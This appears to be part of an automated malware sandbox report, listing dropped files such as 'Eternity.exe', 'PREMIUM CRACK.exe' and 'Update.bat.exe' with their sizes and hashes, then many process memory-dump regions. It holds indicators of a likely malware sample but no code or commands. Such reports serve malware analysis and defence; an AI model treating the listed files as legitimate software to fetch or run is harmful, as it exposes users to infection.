25c39f91f737d80040c72c9e3f95db0fece1c9653f501828adc16cfb1ec59d26

SHA512
157143dd69378e9914ddbb934229cfbc99ae7d80f4f787b7799fc254054d2c7b1e6f4551cddea30470e28b61309f858fcdb2d009b1c32953dfe5ea7fe78e9e48

Download Submit
C:\Users\Admin\Downloads\ENet.Managed.dll

Filesize
827KB

MD5
816a81ac833687f237182ad574a4d6b2

SHA1
53f1ab89e3ceccf0293eeb0b86679e1cc0cc85aa

SHA256
8b75146db5dc7240ab1c3369aa424568a83bb73ae74eb8e8a79b7f440242daa7

SHA512
859f84b4fa1291fd094f31843ebb39f41c926d766d770b07df845c6c08686766166a9b15817f24cd160e659904d4d3865b4daf584400e77c72af3e815bd16378

Download Submit
C:\Users\Admin\Downloads\Eternity.INI

Filesize
129B

MD5
10ff37198ed011c85f8d0b2008eca0e0

SHA1
9c9ff9c131f84f45cf994f495182a7eff97f7728

SHA256
61b3c5445e9229e570a8bd41bebcddd84629effdceca18a99ecc2c9d0afa6aaf

SHA512
ca31f7d81d21fbc54a4da35f55c40e095a86b59940996c0c3fbea45f2c898dfdf9c46eb0f70ec88e7ecea4193afce484e7d08cefcf9fc624047c8651b041b96a

Download Submit
C:\Users\Admin\Downloads\Eternity.exe

Filesize
11.7MB

MD5
023b71797d731bc1785123a9a58fd294

SHA1
391a48507c879bbb811e74050c83e9c89a3613d5

SHA256
4b5cbc404415c6627589f7141d4d7f109ec0ad0385aaa671e317092c75b5d2c4

SHA512
b872000237cec0c882d7a9fcb2a1bf847fe9f969cc6a8401948e87516facc8cdbb0fc8e71460bcc16cce545f9f3fa0f8beb612762f88e91512dd2c6b706c95b8

Download Submit
C:\Users\Admin\Downloads\Eternity.exe

Filesize
12.8MB

MD5
ec5814c2af0bda910351becaf81fdca3

SHA1
4c96a51aa2e6b9790f31752e2d0f52c3902db119

SHA256
fbaa7c08992cce562d27d032c78939fe6da8c1bb851e2fdfd4dea823e26dd7a2

SHA512
2fc87dcfbc798c90e5b17d2b5f03dd744652b4fca05abae696ed087cb2edeedf98edcf1995f302818d0b20a9bf1dbaaf84bd1e1c5ea15dbbccb6e5f6bed65655

Download Submit
C:\Users\Admin\Downloads\Eternity.rar

Filesize
25.1MB

MD5
3c1b26225a7ece5450201f41b6265ac2

SHA1
85f4b15c06abe11d83da930ee0f608403001174a

SHA256
86f9ace08aca978c5cf3d7fd8b07b6976ac6e6445a793ea7944baaf9263c2df8

SHA512
75b44dcb827a5e5970f5ed467b33d53b822c50dcd4e63cb8a349437b1291cb42143f80994de65d2bb2ff13fc7d0f0821dca44303c345e0281d28bb1dddae0258

Download Submit
C:\Users\Admin\Downloads\Eternity.rar

Filesize
2.7MB

MD5
c844f2490d7bef5e65dddcf44886b4fd

SHA1
608d82d0fa748fb15fa69f9c91744e03c0a46eb9

SHA256
e291f5812d4d7466ec37e0bdabba2eade8ab4137d5607c30dac9d1915dd2bef6

SHA512
570d3d62f950459496328236cbd02468840077654ca050790997df4d9f4df15135935a726156488015a2517dd5f1e27d9e2c38b2c4ab5efe0d7eacd6e17949bc

Download Submit
C:\Users\Admin\Downloads\FIxer.bat

Filesize
317KB

MD5
39247dc6f8612afde73bf4e7975cd341

SHA1
e9472555b8123d02c3423cacbe50f37fccca0014

SHA256
498d0135a1da44152d8a19c61df020c61a65d53c21bc176102c027f5145ff4c6

SHA512
f2ab0c967c9b1d5b19721a374b36a8b30947aeceb1e96ec00b1fee171602ace7c605a41889029fc1ca07c10017d4aea760701b0c7d27fa457537de25160fe209

Download Submit
C:\Users\Admin\Downloads\Newtonsoft.Json.dll

Filesize
695KB

MD5
195ffb7167db3219b217c4fd439eedd6

SHA1
1e76e6099570ede620b76ed47cf8d03a936d49f8

SHA256
e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

SHA512
56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

Download Submit
C:\Users\Admin\Downloads\PREMIUM CRACK.exe

Filesize
1.5MB

MD5
b85bf6fe04e6635ff37f66a2eaa28640

SHA1
75f5e7ee80cb6ea83920280a88f4fa55851c46cb

SHA256
dc437a109cb7ec2e9c8662d1166a8f730e52bbed9399c4157f7eabf44e6576f4

SHA512
9f0e38f232eeec90743017b923e693b020a0680fc1d11583fb2b4455a2aa9e8d203685d55a4fe4b4209978abaa2d3c665f312280697e3739679444f87e515b8d

Download Submit
C:\Users\Admin\Downloads\Update.bat

Filesize
303KB

MD5
9574f1be21b67338ff89f7822d497b6c

SHA1
04ffcb12ddae19a42d6ca114ee4b8a3217d77ff4

SHA256
d57da5dbfd8710be350680348344d6e3a319b596cda91475fdd9d007bdf6de1d

SHA512
813cf4b4fdcf0c76ed2f13389596d72278c11d4da08a16725da7b22495ea1c2c876262b36e4eb884335b5ac5125efb1d62a76167fec82e67c99299ceee3b622a

Download Submit
C:\Users\Admin\Downloads\Update.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
\??\pipe\LOCAL\crashpad_2288_BQEBLJFZVPLEVTPV

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1228-317-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/1228-318-0x00000225DF150000-0x00000225DF160000-memory.dmp

Filesize
64KB

Download
memory/1228-411-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/1228-383-0x00000225DF150000-0x00000225DF160000-memory.dmp

Filesize
64KB

Download
memory/1228-332-0x00000225DF150000-0x00000225DF160000-memory.dmp

Filesize
64KB

Download
memory/1228-333-0x00000225DF460000-0x00000225DF6B4000-memory.dmp

Filesize
2.3MB

Download
memory/1228-365-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/1228-367-0x00000225DF150000-0x00000225DF160000-memory.dmp

Filesize
64KB

Download
memory/3376-244-0x00000178C1020000-0x00000178C1030000-memory.dmp

Filesize
64KB

Download
memory/3376-243-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/3376-245-0x00000178C1020000-0x00000178C1030000-memory.dmp

Filesize
64KB

Download
memory/3376-266-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/4148-359-0x0000021C3EDF0000-0x0000021C3EE00000-memory.dmp

Filesize
64KB

Download
memory/4148-338-0x0000021C3EDF0000-0x0000021C3EE00000-memory.dmp

Filesize
64KB

Download
memory/4148-336-0x0000021C3EDF0000-0x0000021C3EE00000-memory.dmp

Filesize
64KB

Download
memory/4148-375-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/4148-335-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/4304-348-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/4304-358-0x000001D836600000-0x000001D836610000-memory.dmp

Filesize
64KB

Download
memory/4304-376-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/4772-659-0x000000006EFC0000-0x000000006EFD2000-memory.dmp

Filesize
72KB

Download
memory/5408-420-0x0000018A59830000-0x0000018A59840000-memory.dmp

Filesize
64KB

Download
memory/5408-419-0x0000018A59830000-0x0000018A59840000-memory.dmp

Filesize
64KB

Download
memory/5408-432-0x0000018A59830000-0x0000018A59840000-memory.dmp

Filesize
64KB

Download
memory/5408-418-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5416-284-0x00000250EEFD0000-0x00000250EEFE0000-memory.dmp

Filesize
64KB

Download
memory/5416-288-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5416-282-0x00000250EEFD0000-0x00000250EEFE0000-memory.dmp

Filesize
64KB

Download
memory/5416-272-0x00000250EEFD0000-0x00000250EEFE0000-memory.dmp

Filesize
64KB

Download
memory/5416-271-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5512-446-0x00000206C02C0000-0x00000206C02D0000-memory.dmp

Filesize
64KB

Download
memory/5512-440-0x00000206C02C0000-0x00000206C02D0000-memory.dmp

Filesize
64KB

Download
memory/5512-445-0x00000206C02C0000-0x00000206C02D0000-memory.dmp

Filesize
64KB

Download
memory/5512-439-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5560-385-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5560-386-0x00000243FF6F0000-0x00000243FF700000-memory.dmp

Filesize
64KB

Download
memory/5560-398-0x00000243FF6F0000-0x00000243FF700000-memory.dmp

Filesize
64KB

Download
memory/5560-401-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5568-370-0x000000001AD70000-0x000000001ADAE000-memory.dmp

Filesize
248KB

Download
memory/5568-416-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5568-362-0x0000000000180000-0x00000000002B4000-memory.dmp

Filesize
1.2MB

Download
memory/5568-363-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5568-364-0x000000001ADC0000-0x000000001AE10000-memory.dmp

Filesize
320KB

Download
memory/5568-366-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

Filesize
4KB

Download
memory/5568-431-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5620-331-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5620-232-0x000002A9C1EC0000-0x000002A9C2112000-memory.dmp

Filesize
2.3MB

Download
memory/5620-320-0x000002A9A7C10000-0x000002A9A7C20000-memory.dmp

Filesize
64KB

Download
memory/5620-299-0x000002A9A7C10000-0x000002A9A7C20000-memory.dmp

Filesize
64KB

Download
memory/5620-219-0x000002A9C1BD0000-0x000002A9C1BF2000-memory.dmp

Filesize
136KB

Download
memory/5620-286-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5620-224-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/5620-229-0x000002A9A7C10000-0x000002A9A7C20000-memory.dmp

Filesize
64KB

Download
memory/5620-230-0x000002A9A7C10000-0x000002A9A7C20000-memory.dmp

Filesize
64KB

Download
memory/5620-231-0x000002A9A7C10000-0x000002A9A7C20000-memory.dmp

Filesize
64KB

Download
memory/5620-306-0x000002A9A7C10000-0x000002A9A7C20000-memory.dmp

Filesize
64KB

Download
memory/6072-319-0x0000025CB7FC0000-0x0000025CB7FD0000-memory.dmp

Filesize
64KB

Download
memory/6072-430-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/6072-387-0x0000025CB7FC0000-0x0000025CB7FD0000-memory.dmp

Filesize
64KB

Download
memory/6072-368-0x0000025CB7FC0000-0x0000025CB7FD0000-memory.dmp

Filesize
64KB

Download
memory/6072-369-0x0000025CB7FC0000-0x0000025CB7FD0000-memory.dmp

Filesize
64KB

Download
memory/6072-371-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download
memory/6072-400-0x00007FF817F40000-0x00007FF817F59000-memory.dmp

Filesize
100KB

Download
memory/6072-378-0x0000025CB7EF0000-0x0000025CB7F08000-memory.dmp

Filesize
96KB

Download
memory/6072-330-0x00007FF804DB0000-0x00007FF805871000-memory.dmp

Filesize
10.8MB

Download